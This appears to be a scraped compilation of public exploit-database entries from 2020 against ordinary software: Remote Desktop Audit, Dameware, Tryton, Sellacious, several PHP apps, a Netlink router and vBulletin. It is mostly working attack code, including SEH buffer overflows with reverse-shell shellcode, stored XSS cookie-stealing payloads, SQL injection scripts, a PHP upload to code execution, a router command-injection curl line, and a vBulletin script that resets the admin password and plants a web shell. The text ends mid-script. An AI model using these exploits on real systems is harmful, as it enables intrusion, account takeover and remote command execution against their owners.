ISHACK AI BOT

# Exploit Title: Remote Desktop Audit 2.3.0.157 - Buffer Overflow (SEH) # Exploit Author: gurbanli # Date: 2020-05-12 # Vulnerable Software: Remote Desktop Audit 2.3.0.157 # Vendor Homepage: https://lizardsystems.com # Version: 2.3.0.157 # Software Link: https://lizardsystems.com/download/rdaudit_setup.exe # Tested on: Windows 7 x86 f = file('payload.txt','w') """ Same with LanSend 3.2, but with different ppr address. PoC 1. Run exploit 2. Run Remote Desktop Audit and Click Add Computers Wizard 3. Choose import computers from file 4. Copy/paste payload.txt content into filename section 5. shellcode will be executed """ """ msfvenom -p windows/shell_reverse_tcp lhost=172.16.74.128 lport=4444 EXITFUNC=thread -f py -v shellcode -e x86/shikata_ga_nai -b '\x00\x0a\x0d' """ shellcode = b"" shellcode += b"\xda\xd0\xd9\x74\x24\xf4\x58\xbe\xa4\x95\xaf" shellcode += b"\xc4\x2b\xc9\xb1\x52\x31\x70\x17\x03\x70\x17" shellcode += b"\x83\x4c\x69\x4d\x31\x70\x7a\x10\xba\x88\x7b" shellcode += b"\x75\x32\x6d\x4a\xb5\x20\xe6\xfd\x05\x22\xaa" shellcode += b"\xf1\xee\x66\x5e\x81\x83\xae\x51\x22\x29\x89" shellcode += b"\x5c\xb3\x02\xe9\xff\x37\x59\x3e\xdf\x06\x92" shellcode += b"\x33\x1e\x4e\xcf\xbe\x72\x07\x9b\x6d\x62\x2c" shellcode += b"\xd1\xad\x09\x7e\xf7\xb5\xee\x37\xf6\x94\xa1" shellcode += b"\x4c\xa1\x36\x40\x80\xd9\x7e\x5a\xc5\xe4\xc9" shellcode += b"\xd1\x3d\x92\xcb\x33\x0c\x5b\x67\x7a\xa0\xae" shellcode += b"\x79\xbb\x07\x51\x0c\xb5\x7b\xec\x17\x02\x01" shellcode += b"\x2a\x9d\x90\xa1\xb9\x05\x7c\x53\x6d\xd3\xf7" shellcode += b"\x5f\xda\x97\x5f\x7c\xdd\x74\xd4\x78\x56\x7b" shellcode += b"\x3a\x09\x2c\x58\x9e\x51\xf6\xc1\x87\x3f\x59" shellcode += b"\xfd\xd7\x9f\x06\x5b\x9c\x32\x52\xd6\xff\x5a" shellcode += b"\x97\xdb\xff\x9a\xbf\x6c\x8c\xa8\x60\xc7\x1a" shellcode += b"\x81\xe9\xc1\xdd\xe6\xc3\xb6\x71\x19\xec\xc6" shellcode += b"\x58\xde\xb8\x96\xf2\xf7\xc0\x7c\x02\xf7\x14" shellcode += b"\xd2\x52\x57\xc7\x93\x02\x17\xb7\x7b\x48\x98" shellcode += b"\xe8\x9c\x73\x72\x81\x37\x8e\x15\x02\xd7\xda" shellcode += b"\x65\x32\xda\xda\x74\x9f\x53\x3c\x1c\x0f\x32" shellcode += b"\x97\x89\xb6\x1f\x63\x2b\x36\x8a\x0e\x6b\xbc" shellcode += b"\x39\xef\x22\x35\x37\xe3\xd3\xb5\x02\x59\x75" shellcode += b"\xc9\xb8\xf5\x19\x58\x27\x05\x57\x41\xf0\x52" shellcode += b"\x30\xb7\x09\x36\xac\xee\xa3\x24\x2d\x76\x8b" shellcode += b"\xec\xea\x4b\x12\xed\x7f\xf7\x30\xfd\xb9\xf8" shellcode += b"\x7c\xa9\x15\xaf\x2a\x07\xd0\x19\x9d\xf1\x8a" shellcode += b"\xf6\x77\x95\x4b\x35\x48\xe3\x53\x10\x3e\x0b" shellcode += b"\xe5\xcd\x07\x34\xca\x99\x8f\x4d\x36\x3a\x6f" shellcode += b"\x84\xf2\x5a\x92\x0c\x0f\xf3\x0b\xc5\xb2\x9e" shellcode += b"\xab\x30\xf0\xa6\x2f\xb0\x89\x5c\x2f\xb1\x8c" shellcode += b"\x19\xf7\x2a\xfd\x32\x92\x4c\x52\x32\xb7" """ 047FFF09 59 POP ECX 047FFF0A 59 POP ECX 047FFF0B 80C1 64 ADD CL,64 047FFF0E ^FFE1 JMP ECX """ jmp_to_shellcode = '\x59\x59\x80\xc1\x64\xff\xe1' """ppr 00418230""" payload = '\x90' * 30 + shellcode + jmp_to_shellcode + 'A' * 12 + '\xeb\xeb\x90\x90' + '\x30\x82\x41' f.write(payload) f.close()

# Exploit Title: Tryton 5.4 - Persistent Cross-Site Scripting # Exploit Author: Vulnerability-Lab # Date: 2020-05-13 # Vendor Homepage: https://www.tryton.org/ # Version: 5.4 # Software Link: https://www.tryton.org/download Document Title: =============== Tryton v5.4 - (Name) Persistent Cross Site Vulnerability References (Source): ==================== https://www.vulnerability-lab.com/get_content.php?id=2233 Common Vulnerability Scoring System: ==================================== 4.4 Product & Service Introduction: =============================== https://www.tryton.org/ & https://www.tryton.org/download Affected Product(s): ==================== Tryton Foundation Product: Tryton v5.4 - CMS (Web-Application) Vulnerability Disclosure Timeline: ================================== 2020-05-12: Public Disclosure (Vulnerability Laboratory) Technical Details & Description: ================================ A persistent input validation web vulnerability has been discovered in the official Tryton v5.4 web-application series. The vulnerability allows remote attackers to inject own malicious script codes with persistent attack vector to compromise browser to web-application requests from the application-side. The persistent vulnerability is located in the `name` parameter of the `User Profile` module. Remote attackers with low privileges are able to inject own malicious persistent script code as name for user accounts. The injected code can be used to attack the frontend or backend of the web-application. The request method to inject is POST and the attack vector is located on the application-side. Injection point is the profile input field with the name value and the execute occurs in the front ui on top right were the avatar is listed or in the admin backend on the res.user;name="Users"&views. Successful exploitation of the vulnerabilities results in session hijacking, persistent phishing attacks, persistent external redirects to malicious source and persistent manipulation of affected application modules. Request Method(s): [+] POST Vulnerable Module(s): [+] User Profile Vulnerable Input(s): [+] Name Vulnerable Parameter(s): [+] name Affected Module(s): [+] /index [+] /model/res.user;name="Users"&views (backend) Proof of Concept (PoC): ======================= The persistent web vulnerability can be exploited by low privileged web application user account with low user interaction. For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue. Manual steps to reproduce the vulnerability ... 1. Open the application and login to your low privileged user account 2. Move to the profile on top right side (click) 3. Inject test payload to the "Name" input field and save the entry 4. Execution occurs after save on top right and /model/res.user;name="Users"&views of the admin backend 5. Successful reproduce of the persistent cross site vulnerability! PoC: Payload %20>"><img%20src="evil.source%20onload=alert(document.cookie)> PoC: Vulnerable Source (Execution Point) <div class="input-group input-group-sm"><span class="input-group-btn"><button type="button" class="btn btn-default">Filters</button></span> <input class="form-control mousetrap" placeholder="Search" autocomplete="off" list="ui-id-3"><datalist id="ui-id-3"></datalist> <span class="input-group-btn"><button type="button" class="btn btn-default hidden-md hidden-lg" aria-label="Clear Search" title="Clear Search" style="display: none;"><img class="icon" src="blob:https://tryton.localhost:8080/4672612e-3ec6-4bd1-aa4d-bd379bd89c04"></button> <button type="submit" class="btn btn-default" aria-label="Search" title="Search"><img class="icon" src="blob:https://demo5.4.tryton.org/ab0d098c-1302-4ffa-8f27-3204fb244082"></button><button class="btn btn-default hidden-xs" type="button" title="Bookmark this filter" aria-label="Bookmark this filter"><img class="icon" aria-hidden="true" src="blob:https://demo5.4.tryton.org/d97b8af2-ca4b-48e2-a40e-a772955d7ea8"></button><button type="button" class="btn btn-default dropdown-toggle" data-toggle="dropdown" aria-expanded="false" aria-label="Bookmarks" title="Bookmarks" id="bookmarks" disabled=""> <img aria-hidden="true" class="icon" src="blob:https://demo5.4.tryton.org/c9b2efdd-1ec8-4785-b7a0-d3b8dcb6d7e9"></button> <ul class="dropdown-menu dropdown-menu-right" role="menu" aria-labelledby="bookmarks"></ul><button type="button" class="btn btn-default hidden-xs" aria-expanded="false" aria-label="Show inactive records" title="Show inactive records"> <img aria-hidden="true" class="icon" src="blob:https://demo5.4.tryton.org/6ad6ad9c-4d17-4592-9e3c-6f698b6f9a27"></button></span></div> --- PoC Session Logs [POST] --- https://tryton.localhost:8080/tryton/ Host: tryton.localhost:8080 Accept: application/json, text/javascript, */*; q=0.01 Content-Type: application/json Authorization: Session ZGVtbzoyOjMyYmIyOWE3ODYxMzA3NGVkZThlMDBhNmEyMWVkNzFhZTAxOGQwMzA1YTJhMGU1NTNjOWU2YTNhZWM5MzA1MzM= X-Requested-With: XMLHttpRequest Content-Length: 527 Origin: https://tryton.localhost:8080 Connection: keep-alive Referer: https://tryton.localhost:8080/ {"id":195,"method":"model.res.user.set_preferences","params":[{"name":"%20>"><img%20src="evil.source%20onload=alert(document.cookie)>">", "signature":"test signature"},{"client":"1aab6de2-1f59-43de-b0d0-a8319558e4e8","warehouse":null,"employee":null,"company":1, "company.rec_name":"Michael Scott Paper Company","language":"en","language_direction":"ltr","groups":[5,15,16,13,19,20,17,9,10], "locale":{"date":"%m/%d/%Y","grouping":[3,3,0],"decimal_point":".","thousands_sep":","},"company_work_time": {"h":3600,"m":60,"s":1,"Y":6912000,"M":576000,"w":144000,"d":28800}}]} - POST: HTTP/2.0 200 OK server: nginx/1.16.1 content-type: application/json access-control-allow-origin: https://tryton.localhost:8080 vary: Origin content-encoding: gzip Credits & Authors: ================== Vulnerability-Lab - https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab Benjamin Kunz Mejri - https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M. -- VULNERABILITY LABORATORY - RESEARCH TEAM

# Exploit Title: Sellacious eCommerce 4.6 - Persistent Cross-Site Scripting # Exploit Author: gurbanli # Date: 2020-05-13 # Vendor Homepage: https://www.sellacious.com # Version: 4.6 # Software Link: https://www.sellacious.com/free-open-source-ecommerce-software Document Title: =============== Sellacious eCommerce - Multiple Persistent Vulnerabilities References (Source): ==================== https://www.vulnerability-lab.com/get_content.php?id=2226 Common Vulnerability Scoring System: ==================================== 4.6 Product & Service Introduction: =============================== https://www.sellacious.com/free-open-source-ecommerce-software Vulnerability Disclosure Timeline: ================================== 2020-05-08: Public Disclosure (Vulnerability Laboratory) Technical Details & Description: ================================ A persistent input validation web vulnerability has been discovered in the official Sellacious eCommerce Shop CMS (2020 Q1). The vulnerability allows remote attackers to inject own malicious script codes with persistent attack vector to compromise browser to web-application requests from the application-side. The cross site web vulnerabilities are located in the all the adress input fields of the `Manage Your Addresses` module. Remote attackers are able to register a low privilege user account to inject own malicious script code to the adress information page. The execution of the script code occurs each time the adress information is used in the web ui of the ecommerce application. The request method to inject is POST and the attack vector is persistent on the application-side. Successful exploitation of the vulnerabilities results in session hijacking, persistent phishing attacks, persistent external redirects to malicious source and persistent manipulation of affected application modules. Request Method(s): [+] POST Vulnerable Module(s): [+] Manage Your Addresses Vulnerable Input(s): [+] Full name [+] First name [+] Middle name [+] Last name [+] Company [+] PO Box [+] Address [+] Landmark Affected(s): [+] index.php/manage-your-addresses [+] Backend user adress information listing Proof of Concept (PoC): ======================= The persistent input validation web vulnerabilities can be exploited by remote attackers with user account and low user interaction. For security demonstration or to reproduce the web vulnerability follow the provided information and steps below to continue. PoC: Exploitation <iframe src="evil.source" onload=alert(document.cookie)> <iframe src="evil.source" onload=alert(document.domain)> PoC: Vulnerable Source <div class="addresses-container"> <div class="address-heading"> <h2>Your addresses <a href="#address-form-0" role="button" data-toggle="ctech-modal" class="ctech-mb-3 btn-add-address ctech-float-right ctech-text-primary"> <i class="fa fa-plus"></i> <span class="add-address-text">Add New Address</span></a></h2></div> <div id="addresses" class="cart-aio ctech-text-center"> <div id="address-editor"> <ul id="address-items" data-original-title="" title=""> <li class="address-item" id="address-item-9"> <div class="ctech-float-right address-action"> <button type="button" class="ctech-btn ctech-btn-small ctech-btn-default hasTooltip remove-address" data-placement="bottom" data-id="9" title="" data-original-title="Delete"><i class="fa fa-trash-alt"></i></button> <a href="#address-form-9" role="button" data-toggle="ctech-modal" data-placement="bottom" class="ctech-btn ctech-btn-small ctech-btn-default hasTooltip" title="" data-original-title="Edit"><i class="fa fa-edit"></i></a> </div> <div class="address-content"> <span class="address_name">>"<iframe src="evil.source"></span> <span class="address_company">>"<iframe src="evil.source"></span> <span class="address_po_box">PO #: >"<iframe src="evil.source"></span> <span class="address_address has-comma">>"<iframe src="evil.source"></span> <span class="address_landmark has-comma">>"<iframe src="evil.source"></span> <span class="address_country">United States</span> <div class="cart_address_box w100p"> <div class="cart_address_buttons"> </div> </div> </div> </li> <li class="address-item odd-address-item"> <a href="#address-form-0" role="button" data-toggle="ctech-modal" class="btn-new-address"><i class="fa fa-plus"></i></a> </li> </iframe></span></div></li></ul> <div class="ctech-wrapper"> </div><div class="ctech-clearfix"></div> </div><div class="ctech-clearfix"></div> </div></div> Credits & Authors: ================== Vulnerability-Lab - https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab Benjamin Kunz Mejri - https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M. -- VULNERABILITY LABORATORY - RESEARCH TEAM

# Exploit Title: Complaint Management System 1.0 - 'username' SQL Injection # Exploit Author: Daniel Ortiz # Date: 2020-05-12 # Vendor Homepage: https://www.sourcecodester.com/php/14206/complaint-management-system.html # Tested on: XAMPP Version 5.6.40 / Windows 10 # Software Link: https://www.sourcecodester.com/php/14206/complaint-management-system.html #!/usr/bin/python import sys import requests import urllib3 urllib3.disable_warnings(urllib3.exceptions.InsecurePlatformWarning) def main(): target = sys.argv[1] payload = "ADMIN' UNION SELECT NULL,NULL,NULL,SLEEP(5)#" url = "http://%s/cms/admin/index.php" % target print("[+] Target: %s") % target print("[+] Injecting payload: %s") % payload inject(url, payload) def inject(url, payload): s = requests.Session() d = {'username': payload, 'password': 'admin', 'submit': ''} r = s.post(url, data=d, proxies=proxy) if __name__ == '__main__': if len(sys.argv) != 2: print("(-) usage: %s TARGET" % sys.argv[0]) print("(-) e.g: %s 192.168.0.10" % sys.argv[0]) sys.exit(-1) main()

# Exploit Title: Dameware Remote Support 12.1.1.273 - Buffer Overflow (SEH) # Exploit Author: gurbanli # Date: 2020-05-13 # Vulnerable Software: Solarwinds Dameware Remote Support 12.1.1.273 # Vendor Homepage: https://www.solarwinds.com/ # Version: 12.1.1.273 # Software Link: https://downloads.solarwinds.com/solarwinds/Release/DameWare/v12.1.1/DamewareRS-St.exe # Tested on: Windows 7 x86 """ poc 1. Run exploit and copy contents of payload.txt 2. Open Dameware Remote Support 3. Click Add active directory support 4. Write any ip address in name or ip address field 5. paste payload .txt content to display name field and click ok 6. Click ok when error pops up 7. Click Yes in dialog box 8. calc pops up Actually, i cant create this exploit with reliable exit, that's why calculator will be executed in background lol :D . but it is not big issue, the main thing is that arbitary code is executed """ file = open('payload.txt','w') max_length = 3604 padding_until_eax = '\x6e\x41' * 57 + '\x6e' align_eax = ( "\x41" # padding (one byte) "\x6e" # padding "\x05\x14\x11" # add eax,11001400 "\x6e" # padding "\x2d\x13\x11" # sub eax,11001300 ) ''' msfvenom -p windows/exec cmd=calc -f raw > shellcode.raw ./alpha2 eax --unicode --uppercase < shellcode.raw ''' shellcode = 'PPYAIAIAIAIAQATAXAZAPA3QADAZABARALAYAIAQAIAQAPA5AAAPAZ1AI1AIAIAJ11AIAIAXA58AAPAZABABQI1AIQIAIQI1111AIAJQI1AYAZBABABABAB30APB944JBKLYXDBKPM0KPS0TIYUNQGPC4TKPPNPDK0RLLTK0RMDTKT2MXLO870JNF01KOFLOLQQSLLBNLMP7Q8OLMM1I7YRL22227DKR2LP4KOZOLTKPLLQRX9SQ8KQHQPQTKPYMPKQJ34KOYLXK3NZQ94KP44KKQXV01KOVLGQ8OLMKQ7WOHIPSEKFM3CML8OKSMMTRUK428DKPXMTM1HSC6TKLLPKTK0XMLKQYCTKKTTKM18PSYPDMTMT1KQK1QPYQJPQKOYPQO1O1J4KLRJKTM1MRJM1DMDEVRKPKPKPPPS8NQTK2OE7KOXUGKJPVUW2PVBH76EEGMUMKO9EOLKV3LLJCPKKK0RULEGKOWLS42RO1ZKPQCKOXUS3QQRL33KPA' ''' ppr address 00b3007e (DNTU.exe) ''' nSEH = '\x61\x6e' # unicode compatible padding SEH = '\x7e\xb3' payload = 'A' * 1764 + nSEH + SEH + align_eax + padding_until_eax + shellcode payload += 'A' * (max_length-len(payload)) print('Payload length:{}'.format(len(payload))) file.write(payload) file.close()

# Exploit Title: E-Commerce System 1.0 - Unauthenticated Remote Code Execution # Exploit Author: SunCSR (Sun* Cyber Security Research - ThienNV) # Date: 2020-05-14 # Vendor Homepage: https://www.sourcecodester.com/php/13524/e-commerce-system-using-phpmysqli.html # Software Link: https://www.sourcecodester.com/sites/default/files/download/janobe/ecommerce.zip # Version: 1.0 # Tested On: Windows 10 Pro 1909 (x64_86) + XAMPP 7.4.5 # Description: E-Commerce System Using PHP/MySQLi - Unauthenticated Remote Code Execution + Unauthenticated SQL Injection ### Description: E-Commerce System Using PHP/MySQLi - Unauthenticated Remote Code Execution + Unauthenticated SQL Injection ###POC 1: Unauthenticated Remote Code Execution via Unrestricted file upload Vulnerabilities url: http://thiennv.com/ecommerce/index.php?q=profile Exploitation: POST /ecommerce/customer/controller.php?action=photos HTTP/1.1 Host: thiennv.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,vi-VN;q=0.8,vi;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=---------------------------270177040916945863071313890828 Content-Length: 4723 Origin: http://thiennv.com Connection: close Referer: http://thiennv.com/ecommerce/index.php?q=profile Cookie: advanced_ads_hide_deactivate_feedback=1; wplc_chat_status=5; _icl_current_language=en; nc_status=browsing; tcx_customerID=rJQlLlHFcU; wplc_cid=Bk4eLeHFcI_1589362760300; PHPSESSID=909kc73hdpc69l5vk6malipke7 Upgrade-Insecure-Requests: 1 -----------------------------270177040916945863071313890828 Content-Disposition: form-data; name="MAX_FILE_SIZE" 1000000 -----------------------------270177040916945863071313890828 Content-Disposition: form-data; name="photo"; filename="logo1.php" Content-Type: image/png ‰PNG IHDR á á m"H &PLTEÝ=1ÿÿÿ <?php phpinfo() ?> -----------------------------270177040916945863071313890828 Content-Disposition: form-data; name="savephoto" -----------------------------270177040916945863071313890828-- ###POC 2: Unauthenticated SQL Injection Vulnerabilities url: http://192.168.17.65:80/ecommerce/index.php?q=product&category=-2854' Exploitation: Parameter: #1* (URI) Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment) Payload: http://192.168.17.65:80/ecommerce/index.php?q=product&category=-2854' OR 6075=6075# Type: error-based Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: http://192.168.17.65:80/ecommerce/index.php?q=product&category=' OR (SELECT 2158 FROM(SELECT COUNT(*),CONCAT(0x71706a7a71,(SELECT (ELT(2158=2158,1))),0x7170767671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- FBZp Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: http://192.168.17.65:80/ecommerce/index.php?q=product&category=' AND (SELECT 5509 FROM (SELECT(SLEEP(5)))dkZy)-- vkPi Type: UNION query Title: MySQL UNION query (NULL) - 20 columns Payload: http://192.168.17.65:80/ecommerce/index.php?q=product&category=' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x71706a7a71,0x644764427169434a594a57726f4a744c517a58554b59485152524842596454684f4d504d6d644868,0x7170767671),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# --- [11:22:17] [INFO] the back-end DBMS is MySQL back-end DBMS: MySQL >= 5.0 (MariaDB fork) [11:22:17] [INFO] fetching database names available databases [6]: [*] db_ecommerce [*] information_schema [*] mysql [*] performance_schema [*] phpmyadmin [*] test -------------------------------------------------------------------------------------------------------------Best Regards! (*Mr) Ngo Van Thien*

# Exploit Title: Netlink XPON 1GE WiFi V2801RGW - Remote Command Execution # Google Dork: Not applicable # Date: 2020-05-13 # Exploit Author: Seecko Das # Vendor Homepage: https://www.crtindia.com/ # Version: V3.3.0-190627 # Tested on: Windows 10/Linux (Kali) # CVE: N/A Exploit : curl -L -d "target_addr=1.1.1.1+%7C+ls&waninf=1_INTERNET_R_VID_168" http://IPADDRESS/boaform/admin/formPing Response : <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <!--ϵͳĬ��ģ��--> <html> <head> <title>PING���Խ��</title> <meta http-equiv=pragma content=no-cache> <meta http-equiv=refresh content="2"> <meta http-equiv=cache-control content="no-cache, must-revalidate"> <meta http-equiv=content-type content="text/html; charset=gbk"> <meta http-equiv=content-script-type content=text/javascript> <!--ϵͳ����css--> <style type=text/css> @import url(/style/default.css); </style> <!--ϵͳ�����ű�--> <script language="javascript" src="common.js"></script> </head> <!--------------------------------------------------------------------------------------> <!--��ҳ����--> <body topmargin="0" leftmargin="0" marginwidth="0" marginheight="0" alink="#000000" link="#000000" vlink="#000000"> <blockquote> <form> <div align="left" style="padding-left:20px;"><br> <div align="left"><b>Please wait</b> <br><br> </div> <pre> boa.conf web </pre> <input type=button value="back" onClick=window.location.replace("/diag_ping_admin.asp")> </div> </form> </blockquote> </body> </html>

# Exploit Title: vBulletin 5.6.1 - 'nodeId' SQL Injection # Date: 2020-05-15 # Exploit Author: Photubias # Vendor Advisory: [1] https://forum.vbulletin.com/forum/vbulletin-announcements/vbulletin-announcements_aa/4440032-vbulletin-5-6-1-security-patch-level-1 # Version: vBulletin v5.6.x (prior to Patch Level 1) # Tested on: vBulletin v5.6.1 on Debian 10 x64 # CVE: CVE-2020-12720 vBulletin v5.6.1 (SQLi) with path to RCE #!/usr/bin/env python3 ''' Copyright 2020 Photubias(c) This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see <http://www.gnu.org/licenses/>. File name CVE-2020-12720.py written by tijl[dot]deneut[at]howest[dot]be for www.ic4.be This is a native implementation without requirements, written in Python 3. Works equally well on Windows as Linux (as MacOS, probably ;-) ##-->> Full creds to @zenofex and @rekter0 <<--## ''' import urllib.request, urllib.parse, sys, http.cookiejar, ssl, random, string ## Static vars; change at will, but recommend leaving as is sADMINPASS = '12345678' sCMD = 'id' sURL = 'http://192.168.50.130/' sUSERID = '1' sNEWPASS = '87654321' iTimeout = 5 ## Ignore unsigned certs ssl._create_default_https_context = ssl._create_unverified_context ## Keep track of cookies between requests cj = http.cookiejar.CookieJar() oOpener = urllib.request.build_opener(urllib.request.HTTPCookieProcessor(cj)) def randomString(stringLength=8): letters = string.ascii_lowercase return ''.join(random.choice(letters) for i in range(stringLength)) def getData(sUrl, lData): try: oData = urllib.parse.urlencode(lData).encode() oRequest = urllib.request.Request(url = sUrl, data = oData) return oOpener.open(oRequest, timeout = iTimeout) except: print('----- ERROR, site down?') sys.exit(1) def verifyBug(sURL,sUserid='1'): sPath = 'ajax/api/content_infraction/getIndexableContent' lData = {'nodeId[nodeid]' : '1 UNION SELECT 26,25,24,23,22,21,20,19,20,17,16,15,14,13,12,11,10,"cve-2020-12720",8,7,6,5,4,3,2,1;--'} sResponse = getData(sURL + sPath, lData).read().decode() if not 'cve-2020-12720' in sResponse: print('[!] Warning: not vulnerable to CVE-2020-12720, credentials are needed!') return False else: print('[+] SQLi Success!') return True def takeoverAccount(sURL, sNEWPASS): sPath = 'ajax/api/content_infraction/getIndexableContent' ### Source: https://github.com/rekter0/exploits/tree/master/CVE-2020-12720 ## Get Table Prefixes lData = {'nodeId[nodeid]' : '1 UNION SELECT 26,25,24,23,22,21,20,19,20,17,16,15,14,13,12,11,10,table_name,8,7,6,5,4,3,2,1 from information_schema.columns WHERE column_name=\'phrasegroup_cppermission\';--'} sResponse = getData(sURL + sPath, lData).read().decode() if 'rawtext' in sResponse: sPrefix = sResponse.split('rawtext')[1].split(':')[1].replace('}','').replace('"','').replace('language','') else: sPrefix = '' #print('[+] Got table prefix "'+sPrefix+'"') ## Get usergroup ID for "Administrators" lData = {'nodeId[nodeid]' : '1 UNION SELECT 26,25,24,23,22,21,20,19,20,17,16,15,14,13,12,11,10,usergroupid,8,7,6,5,4,3,2,1 from ' + sPrefix + 'usergroup WHERE title=\'Administrators\';--'} sResponse = getData(sURL + sPath, lData).read().decode() sGroupID = sResponse.split('rawtext')[1].split(':')[1].replace('}','').replace('"','') #print('[+] Administrators Group ID: '+sGroupID) ## Get admin data, including original token (password hash), TODO: an advanced exploit could restore the original hash in post exploitation lData = {'nodeId[nodeid]' : '1 UNION SELECT 26,25,24,23,22,21,20,19,20,17,16,15,14,13,12,11,10,concat(username,0x7c,userid,0x7c,email,0x7c,token),8,7,6,5,4,3,2,1 from ' + sPrefix + 'user where usergroupid=' + sGroupID + ';--'} sResponse = getData(sURL + sPath, lData).read().decode() sUsername,sUserid,sUsermail,sUserTokenOrg = sResponse.split('rawtext')[1].split(':')[1].replace('}','').replace('"','').split('|') #print('[+] Got original token (' + sUsername + ', ' + sUsermail + '): ' + sUserTokenOrg) ## Let's create a Human Verify Captcha sPath = 'ajax/api/hv/generateToken?' lData = {'securitytoken':'guest'} sResponse = getData(sURL + sPath, lData).read().decode() if 'hash' in sResponse: sHash = sResponse.split('hash')[1].split(':')[1].replace('}','').replace('"','') else: sHash = '' ## Get the captcha answer from DB sPath = 'ajax/api/content_infraction/getIndexableContent' lData = {'nodeId[nodeid]':'1 UNION SELECT 26,25,24,23,22,21,20,19,20,17,16,15,14,13,12,11,10,count(answer),8,7,6,5,4,3,2,1 from ' + sPrefix + 'humanverify limit 0,1--'} sResponse = getData(sURL + sPath, lData).read().decode() if 'rawtext' in sResponse: iAnswers = int(sResponse.split('rawtext')[1].split(':')[1].replace('}','').replace('"','')) else: iAnswers = 1 lData = {'nodeId[nodeid]':'1 UNION SELECT 26,25,24,23,22,21,20,19,20,17,16,15,14,13,12,11,10,answer,8,7,6,5,4,3,2,1 from ' + sPrefix + 'humanverify limit ' + str(iAnswers-1) + ',1--'} sResponse = getData(sURL + sPath, lData).read().decode() if 'rawtext' in sResponse: sAnswer = sResponse.split('rawtext')[1].split(':')[1].replace('}','').replace('"','') else: sAnswer = '' ## Now request PW reset and retrieve the token sPath = 'auth/lostpw' lData = {'email':sUsermail,'humanverify[input]':sAnswer,'humanverify[hash]':sHash,'securitytoken':'guest'} sResponse = getData(sURL + sPath, lData).read().decode() sPath = 'ajax/api/content_infraction/getIndexableContent' lData = {'nodeId[nodeid]':'1 UNION SELECT 26,25,24,23,22,21,20,19,20,17,16,15,14,13,12,11,10,activationid,8,7,6,5,4,3,2,1 from ' + sPrefix + 'useractivation WHERE userid=' + sUserid + ' limit 0,1--'} sResponse = getData(sURL + sPath, lData).read().decode() if 'rawtext' in sResponse: sToken = sResponse.split('rawtext')[1].split(':')[1].replace('}','').replace('"','') else: sToken = '' ## Finally the password reset itself sPath = 'auth/reset-password' lData = {'userid':sUserid,'activationid':sToken,'new-password':sNEWPASS,'new-password-confirm':sNEWPASS,'securitytoken':'guest'} sResponse = getData(sURL + sPath, lData).read().decode() if not 'Logging in' in sResponse: print('[-] Failed to reset the password') return '' else: print('[+] Success! User ' + sUsername + ' now has password ' + sNEWPASS) return sUserid def createBackdoor(sURL, sADMINPASS, sUserid='1'): ## Activating Sitebuilder sPath = 'ajax/activate-sitebuilder' lData = {'pageid':'1', 'nodeid':'0','userid':'1','loadMenu':'false', 'isAjaxTemplateRender':'true', 'isAjaxTemplateRenderWithData':'true','securitytoken':'1589477194-0e3085507fb50fc1631610a28e045c5fa71a2a12'} oResponse = getData(sURL + sPath, lData) if not oResponse.code == 200: print('[-] Error activating sitebuilder') sys.exit(1) ## Confirming the password, getting new securitytoken sPath = 'auth/ajax-login' lData = {'logintype':'cplogin','userid':sUserid,'password':sADMINPASS,'securitytoken':'1589477194-0e3085507fb50fc1631610a28e045c5fa71a2a12'} oResponse = getData(sURL + sPath, lData) sResponse = oResponse.read().decode() if 'lostpw' in sResponse: print('[-] Error: authentication for userid ' + sUserid + ' failed') sys.exit(1) sToken = sResponse.split(',')[1].split(':')[1].replace('"','').replace('}','') print('[+] Got token: '+sToken) ## cpsession is needed, use this for extra verification #for cookie in cj: print(cookie.name, cookie.value, cookie.domain) #etc etc ## First see if our backdoor does not already exists sPath = 'ajax/render/admin_sbpanel_pagelist_content_wrapper' lData = {'isAjaxTemplateRenderWithData':'true','securitytoken':sToken} oResponse = getData(sURL + sPath, lData) sResponse = oResponse.read().decode() if 'cve-2020-12720' in sResponse: sPageName = 'cve-2020-12720-' + sResponse.split('/cve-2020-12720-')[1].split(')')[0] print('[+] This machine was already pwned, using "' + sPageName + '" for your command') return sPageName ## Create a new empty page sPath = 'ajax/api/widget/saveNewWidgetInstance' lData = {'containerinstanceid':'0','widgetid':'23','pagetemplateid':'','securitytoken':sToken} oResponse = getData(sURL + sPath, lData) sResponse = oResponse.read().decode() sWidgetInstanceID = sResponse.split(',')[0].split(':')[1].replace('}','') sPageTemplateID = sResponse.split(',')[1].split(':')[1].replace('}','') print('[+] Got WidgetInstanceID: '+sWidgetInstanceID+' and PageTemplateID: '+sPageTemplateID) ## Now submitting the page content sPageName = 'cve-2020-12720-'+randomString() sPath = 'ajax/api/widget/saveAdminConfig' lData = {'widgetid':'23', 'pagetemplateid':sPageTemplateID, 'widgetinstanceid':sWidgetInstanceID, 'data[widget_type]':'', 'data[title]':sPageName, 'data[show_at_breakpoints][desktop]':'1', 'data[show_at_breakpoints][small]':'1', 'data[show_at_breakpoints][xsmall]':'1', 'data[hide_title]':'0', 'data[module_viewpermissions][key]':'show_all', 'data[code]':"echo('###SHELLRESULT###');system($_GET['cmd']);echo('###SHELLRESULT###');", 